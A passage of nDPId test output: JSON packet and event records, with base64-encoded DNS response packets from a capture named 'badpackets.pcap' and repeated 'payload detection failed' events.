g3XZWYEgJTSqnXRaYhwfpdJtUS4EbhA6YOcBVAAIAAQAADhAADANuczMFZnd3Z2\/AXsBVAAIAAQAADhAABgNuczLBc8BVAAIAAQAADhAABgNuczXBc8BVAAIAAQAADhAABgNuczHBc8BVAAIAAQAADhAABgNuczTBc8BVAC4AAQAADhABIAACBwIAAA4QcNvYgFkGc0W0+Ahub3ZvcG9ybgNjb20AcFsxOk+TskskfmYioP9UewSZSL9WmuTUot1PfZFKaiFZLalRXKlbejn1Bpls9bVGMNJ8VYVUfoGcuesziAD8mlHukbkBjCvqsQLQJlUn18HhsM8Un6BUiQsAyEQsQp5HXtsXSzUuW2h7pa5HvFt51KDRqdLdfTwvCR7QFOYApeIeE7jGd14b6fcFUUntTWakr8Diay1Cx6MEqchNtPP8y5WWowh4rqtf9abZ6MihUGhOYq4GAOz7667QkstI2cH0PhPu2Q\/5ONAvjTiLfKSfgeeGC8VSswFyq2aFb6HIlVmYOK1XmDe3BmP7FLuXhq9PlJ6aBBY41kBThidqiIzU58GrAAEAAQAADhAABGjskh7BhwABAAEAAA4QAATAYM65wW8AAQABAAAOEAAEJTBzbsG9AAEAAQAADhAABC6l7FHBmQABAAEAAA4QAASAx\/RywasALgABAAAOEAEdAAEHAw=="} 01461{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":889,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":889,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcuAIgADYRFDWAx\/RyzLpQ5QA1xd4JH1hTgneEEAABAAIABgALCGNvbnRlbnQ0CG5vdm9wb3JuA2NvbQAAAQABwAwAAQABAAAOEAAExgc9H8AMAC4AAQAADhABIAABBwMAAA4QcNvYgFkGc0W0+Ahub3ZvcG9ybgNjb20AlewZozFU2n96aVRqxQUtXjawCyGgM6B0TzRF56i4jQojMtEEU5RHV2P7Vi\/giydID14A4YyUQ85+uCYlFI0DOCtWk0z5XmpprtC9X+\/T1\/r4JD0uPBpyimV4NZ7fwQxxt5\/3s2rlf4r73xWZZ+3IUuJ2vwbncpUyzu1TuFq+36Vdmu0LH4Wzte\/E0y2pkf37K2RBRQ7Nn\/d+Xj6t5ggL4KWxhT3Q0vSCylzZfyLrz2NK8Qb9WKZPaGXKWrHYVjLVERNJemNdvrQWUyPUJZC8YuSGBgJRiBu7nGJd9NUwi+LJQ8nOWu\/g3XZWYEgJTSqnXRaYhwfpdJtUS4EbhA6YOcBVAAIAAQAADhAADANuczMFZnd3Z2\/AXsBVAAIAAQAADhAABgNuczLBc8BVAAIAAQAADhAABgNuczXBc8BVAAIAAQAADhAABgNuczHBc8BVAAIAAQAADhAABgNuczTBc8BVAC4AAQAADhABIAACBwIAAA4QcNvYgFkGc0W0+Ahub3ZvcG9ybgNjb20AcFsxOk+TskskfmYioP9UewSZSL9WmuTUot1PfZFKaiFZLalRXKlbejn1Bpls9bVGMNJ8VYVUfoGcuesziAD8mlHukbkBjCvqsQLQJlUn18HhsM8Un6BUiQsAyEQsQp5HXtsXSzUuW2h7pa5HvFt51KDRqdLdfTwvCR7QFOYApeIeE7jGd14b6fcFUUntTWakr8Diay1Cx6MEqchNtPP8y5WWowh4rqtf9abZ6MihUGhOYq4GAOz7667QkstI2cH0PhPu2Q\/5ONAvjTiLfKSfgeeGC8VSswFyq2aFb6HIlVmYOK1XmDe3BmP7FLuXhq9PlJ6aBBY41kBThidqiIzU58GrAAEAAQAADhAABGjskh7BhwABAAEAAA4QAATAYM65wW8AAQABAAAOEAAEJTBzbsG9AAEAAQAADhAABC6l7FHBmQABAAEAAA4QAASAx\/RywasALgABAAAOEAEdAAEHAw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":68,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":855,"global_ts_msec":1495451745785} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":68,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":855,"global_ts_msec":1495451745785}
01302{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":69,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcFmEgADMRoAeBBg0DzLpQ5QA14pUIoA41h4GEEAABAAMABAANBnRpbWUtYQRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEgQYPHMAMAC4AAQAABwgAnAABBwMAAAcIWSp7HVkhN25NKgRuaXN0A2dvdgCGDxP8mtTYURB\/z7B7zxG9M2cDPFjwCkCpyC8hiadTCV1wXBnQsMkH14gORQid9hZZkwqvAJKxlHHGFpFXs3GK70k31UcnglQglR+Jb8PvkvYMpqGZLiMdOZ+8aMQzLgN424FbMJ7np\/GSsY0NKbDsZWUKs5FEyvfl5LyBAXKP1cAMAC4AAQAABwgAnAABBwMAAAcIWSp7HVkhN25p9QRuaXN0A2dvdgCYOPJp1LyXHjTZERVC1mhE\/fFAgBPnHg5CzHCfHFW\/kHrSlPUKJrKTtWO2J6nhnsslWGL7StwY\/Ds0w3d1K1BK2EXHmf7JoxCpUcbjrJzE2AWNOuFyYMsitmrbg7hKpTz5YORW9N+9SgnPiRBdVePJPZ0ZX+5rKPwGXiVkzOvJt8D3AAIAAQAABwgABgNnZWHA98D3AAIAAQAABwgABgNiZWHA98D3AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHDAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"} 01288{"packet_event_id":1,"packet_event_name":"packet","packet_id":69,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcFmEgADMRoAeBBg0DzLpQ5QA14pUIoA41h4GEEAABAAMABAANBnRpbWUtYQRuaXN0A2dvdgAAAQABwAwAAQABAAAHCAAEgQYPHMAMAC4AAQAABwgAnAABBwMAAAcIWSp7HVkhN25NKgRuaXN0A2dvdgCGDxP8mtTYURB\/z7B7zxG9M2cDPFjwCkCpyC8hiadTCV1wXBnQsMkH14gORQid9hZZkwqvAJKxlHHGFpFXs3GK70k31UcnglQglR+Jb8PvkvYMpqGZLiMdOZ+8aMQzLgN424FbMJ7np\/GSsY0NKbDsZWUKs5FEyvfl5LyBAXKP1cAMAC4AAQAABwgAnAABBwMAAAcIWSp7HVkhN25p9QRuaXN0A2dvdgCYOPJp1LyXHjTZERVC1mhE\/fFAgBPnHg5CzHCfHFW\/kHrSlPUKJrKTtWO2J6nhnsslWGL7StwY\/Ds0w3d1K1BK2EXHmf7JoxCpUcbjrJzE2AWNOuFyYMsitmrbg7hKpTz5YORW9N+9SgnPiRBdVePJPZ0ZX+5rKPwGXiVkzOvJt8D3AAIAAQAABwgABgNnZWHA98D3AAIAAQAABwgABgNiZWHA98D3AC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMHDAC4AAQAABwgAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":69,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451748818} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":69,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451748818}
02309{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":70,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGOsgADcRhwqY2AekzLpQ5QA1zeYLg6WA7YmEAAABAAIABQAPA25zMwNpcnMDZ292AAABAAHADAABAAEAABwgAASY2AuEwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAUaOVDQJwftL9gtrUM8RfLB6qSOBXZLTc9Hok\/6MIUcY0p+ZXalWKsGuV0qSYiHp0ZrSW1UB4GFMJyv7xm1d\/Po\/u1S5R08MeFVA+R2ZtvHBErM7kw\/4vE2A51h\/i02hoLPEPwvEXL7BXREwrjYl2TQspuWnPYjiGXk63g8xr6TFgux7jb2BRXQ4LBHynjXnnvpt3XYYGbcmWAyGPAsOf9hQuEFUTW8B15ZH+YidKzPQ1rU9pRShm7Pd3FpYAiKLk4i351zYZI20c8JNuwICCSg9UMWYXsfMXQ+CnSvsgbvApAMm6rh0DMcwkAJPfalPrGBEcb5Z1jx4wdGgAiCBer8AQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAABgNuczLAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFgAAEAAQAAHCAABJjYB6TBYAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwXIAAQABAAAcIAAEmNgHpcFyAC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AAiDKcsFAKyZAPT6\/BqMm4YGNjnILP\/RiBRbrxE19HyRiZVJxwCUqilv0dC8z9SJfb+rPNQabkmaQAfOPcKhH1sxV5brmQeQEeenqlUiW5YLjefk+NMQgd+NRuOdvGYchkWl5fnmMau\/HlA+HBNsAZN1e+HH49Qw2zLGAFvFYJOqPF\/HCttPr0DY7fU3q\/deTFsRESwvpQebvinvb3rUKnldKnGamoYPobR4sa3Hc7XJ1UAcE0x56k\/d9TLBNjQCHoPmejklH71ALytcz1kqNyblcIX4lJZisb91+kN14GrJEgCW46spplu2sT6hC4lmdNpv9JaIXIh6VBVmBv4anY3BkgABAAEAABwgAASY2AuFwZIALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAJ3yCZvDhJMpICeF2AdNj6dX83t1aIlZReudVBhsa5qliqrUuu1fMBb1RYQ38UscZhlrQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="} 02295{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGOsgADcRhwqY2AekzLpQ5QA1zeYLg6WA7YmEAAABAAIABQAPA25zMwNpcnMDZ292AAABAAHADAABAAEAABwgAASY2AuEwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAUaOVDQJwftL9gtrUM8RfLB6qSOBXZLTc9Hok\/6MIUcY0p+ZXalWKsGuV0qSYiHp0ZrSW1UB4GFMJyv7xm1d\/Po\/u1S5R08MeFVA+R2ZtvHBErM7kw\/4vE2A51h\/i02hoLPEPwvEXL7BXREwrjYl2TQspuWnPYjiGXk63g8xr6TFgux7jb2BRXQ4LBHynjXnnvpt3XYYGbcmWAyGPAsOf9hQuEFUTW8B15ZH+YidKzPQ1rU9pRShm7Pd3FpYAiKLk4i351zYZI20c8JNuwICCSg9UMWYXsfMXQ+CnSvsgbvApAMm6rh0DMcwkAJPfalPrGBEcb5Z1jx4wdGgAiCBer8AQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAABgNuczLAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFgAAEAAQAAHCAABJjYB6TBYAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwXIAAQABAAAcIAAEmNgHpcFyAC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AAiDKcsFAKyZAPT6\/BqMm4YGNjnILP\/RiBRbrxE19HyRiZVJxwCUqilv0dC8z9SJfb+rPNQabkmaQAfOPcKhH1sxV5brmQeQEeenqlUiW5YLjefk+NMQgd+NRuOdvGYchkWl5fnmMau\/HlA+HBNsAZN1e+HH49Qw2zLGAFvFYJOqPF\/HCttPr0DY7fU3q\/deTFsRESwvpQebvinvb3rUKnldKnGamoYPobR4sa3Hc7XJ1UAcE0x56k\/d9TLBNjQCHoPmejklH71ALytcz1kqNyblcIX4lJZisb91+kN14GrJEgCW46spplu2sT6hC4lmdNpv9JaIXIh6VBVmBv4anY3BkgABAAEAABwgAASY2AuFwZIALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAJ3yCZvDhJMpICeF2AdNj6dX83t1aIlZReudVBhsa5qliqrUuu1fMBb1RYQ38UscZhlrQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":70,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":70,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278}
02306{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":71,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGO8gADcRhwaY2AekzLpQ5QA1NzILg45YlzKEAAABAAIABQAPA25zMgNpcnMDZ292AAABAAHADAABAAEAABwgAASY2AelwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YACIMpywUArJkA9Pr8GoybhgY2Ocgs\/9GIFFuvETX0fJGJlUnHAJSqKW\/R0LzP1Il9v6s81BpuSZpAB849wqEfWzFXluuZB5AR56eqVSJblguN5+T40xCB341G4528ZhyGRaXl+eYxq78eUD4cE2wBk3V74cfj1DDbMsYAW8Vgk6o8X8cK20+vQNjt9Ter915MWxERLC+lB5u+Ke9vetQqeV0qcZqahg+htHixrcdztcnVQBwTTHnqT931MsE2NAIeg+Z6OSUfvUAvK1zPWSo3JuVwhfiUlmKxv3X6Q3XgaskSAJbjqymmW7axPqELiWZ02m\/0lohciHpUFWYG\/hqdjcAQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zM8AQwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFgAAEAAQAAHCAABJjYB6TBYAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwYAAAQABAAAcIAAEmNgLhMGAAC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AFGjlQ0CcH7S\/YLa1DPEXyweqkjgV2S03PR6JP+jCFHGNKfmV2pVirBrldKkmIh6dGa0ltVAeBhTCcr+8ZtXfz6P7tUuUdPDHhVQPkdmbbxwRKzO5MP+LxNgOdYf4tNoaCzxD8LxFy+wV0RMK42Jdk0LKblpz2I4hl5Ot4PMa+kxYLse429gUV0OCwR8p415576bd12GBm3JlgMhjwLDn\/YULhBVE1vAdeWR\/mInSsz0Na1PaUUoZuz3dxaWAIii5OIt+dc2GSNtHPCTbsCAgkoPVDFmF7HzF0Pgp0r7IG7wKQDJuq4dAzHMJACT32pT6xgRHG+WdY8eMHRoAIggXq\/BkgABAAEAABwgAASY2AuFwZIALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAJ3yCZvDhJMpICeF2AdNj6dX83t1aIlZReudVBhsa5qliqrUuu1fMBb1RYQ38UscZhlrQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="} 02292{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGO8gADcRhwaY2AekzLpQ5QA1NzILg45YlzKEAAABAAIABQAPA25zMgNpcnMDZ292AAABAAHADAABAAEAABwgAASY2AelwAwALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YACIMpywUArJkA9Pr8GoybhgY2Ocgs\/9GIFFuvETX0fJGJlUnHAJSqKW\/R0LzP1Il9v6s81BpuSZpAB849wqEfWzFXluuZB5AR56eqVSJblguN5+T40xCB341G4528ZhyGRaXl+eYxq78eUD4cE2wBk3V74cfj1DDbMsYAW8Vgk6o8X8cK20+vQNjt9Ter915MWxERLC+lB5u+Ke9vetQqeV0qcZqahg+htHixrcdztcnVQBwTTHnqT931MsE2NAIeg+Z6OSUfvUAvK1zPWSo3JuVwhfiUlmKxv3X6Q3XgaskSAJbjqymmW7axPqELiWZ02m\/0lohciHpUFWYG\/hqdjcAQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zM8AQwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFgAAEAAQAAHCAABJjYB6TBYAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwYAAAQABAAAcIAAEmNgLhMGAAC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AFGjlQ0CcH7S\/YLa1DPEXyweqkjgV2S03PR6JP+jCFHGNKfmV2pVirBrldKkmIh6dGa0ltVAeBhTCcr+8ZtXfz6P7tUuUdPDHhVQPkdmbbxwRKzO5MP+LxNgOdYf4tNoaCzxD8LxFy+wV0RMK42Jdk0LKblpz2I4hl5Ot4PMa+kxYLse429gUV0OCwR8p415576bd12GBm3JlgMhjwLDn\/YULhBVE1vAdeWR\/mInSsz0Na1PaUUoZuz3dxaWAIii5OIt+dc2GSNtHPCTbsCAgkoPVDFmF7HzF0Pgp0r7IG7wKQDJuq4dAzHMJACT32pT6xgRHG+WdY8eMHRoAIggXq\/BkgABAAEAABwgAASY2AuFwZIALgABAAAcIAEbAAEIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAJ3yCZvDhJMpICeF2AdNj6dX83t1aIlZReudVBhsa5qliqrUuu1fMBb1RYQ38UscZhlrQBQAAAAAAAGEBAAAAAAAAQwAAAAAAAADE0AAAxA=="}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":71,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":71,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1467,"global_ts_msec":1495451756278}
02312{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":72,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcGPEgADcRhwSY2AekzLpQ5QA1Q8QLg5NBAMmEAAABAAIABQAPA25zMwNpcnMDZ292AAAcAAHADAAcAAEAABwgABAmEAAwIAAAUwAAAAAAAACQwAwALgABAAAcIAEbABwIAwAAHCBZK47XWSJGR6xiA2lycwNnb3YAggGB5zn+E1Pg+FLMqTHnbMA\/oOer5LeX4aIHpNS4o6eo3\/mQLBqkFditZ2io9gnZB4qh2JsMATiESYiHWEYj0bEtKixiKHmqgPaqgsClUlMc36a53fLyVtyHOsfb4Bn06ipKA\/mFDV0+OoNw8Y3Ho1jSbY7bHubvRM+pfr9JzoRxfb3DWL73ZWluCLfXSQajOLrJJnVQ+P2lNfaTK3czYjjMf3wRU9NKWnRGD4+bDy+2RctwKE\/IMs\/GjQVGFjztYPa6p\/mlAS1K5K4FizcZBjmrNEKa71WUgVe3uiPYOufTuXw7A\/z431698ylT38+Lw74o4px+sIHQ1lAUZBM4AMAQAAIAAQAAHCAABgNuczHAEMAQAAIAAQAAHCAABgNuczLAEMAQAAIAAQAAHCAAAsAMwBAAAgABAAAcIAAGA25zNMAQwBAALgABAAAcIAEbAAIIAgAAHCBZK47XWSJGR6xiA2lycwNnb3YAe+rn2tmycvJNbOGLWjldMLdA22UT7xzZh6HJYvuJrE5+qGxJ\/K9yON+rGW5STnO8kj2d7HsVVtkx7ts0\/\/XDYlHvMvWnWK\/Dq3C0qhX4Y4OXOL2k9lkOXDls5DytCZ+qVKg+alb58DzoDOU5yVHtP9rMKfk9VxtfA9LIEQBilUu0fUAjg6x8b2zwKV\/jt6dY6YdR2oAGxQWcfwUhdEB3XcH5NlvhjHUGSlAUPWnm6zjJAgd2MgFTKihm5f+gD+mtCN9sSjuoCyjb\/J+INEr+l8If9XkT6uujAFdNt62xgrprlhR\/4ZT3wgiZkdJcmZ4Hrkq2N2BnT7dMThz1hN6ZBcFsAAEAAQAAHCAABJjYB6TBbAAuAAEAABwgARsAAQgDAAAcIFkrjtdZIkZHrGIDaXJzA2dvdgCNfUC+vOaSAIQikt\/wOmN6FcRNH787rVK7vx8EOTihWPPbRHscOApvDuppsQAybpUJQDSnhmKXzmW0RGA6n2G0ciYqXXOsL0P3\/\/ygg+7XWZuYzKb304Zfx6QfhPLSsEP8shH+rTSNdno\/S62Ol7IpIPQ0RCioobQ2UR\/UDEXTGGbKuR4mDZJLFYeh5tIFpoqvTkHShLjF6v2OlcN8aKTXl7dgMdindVnqMLXbceQ\/g0+K8BgVnEE\/6MZYL80Ns\/V8grnGdCpO48BX8ffkLGatTdnf+50+sN\/QX2lbVRYMuygjrQrIMeAro+VDEin8TTXEdrj+U639Pp8xolDwNQMSwX4AAQABAAAcIAAEmNgHpcF+AC4AAQAAHCABGwABCAMAABwgWSuO11kiRkesYgNpcnMDZ292AAiDKcsFAKyZAPT6\/BqMm4YGNjnILP\/RiBRbrxE19HyRiZVJxwCUqilv0dC8z9SJfb+rPNQabkmaQ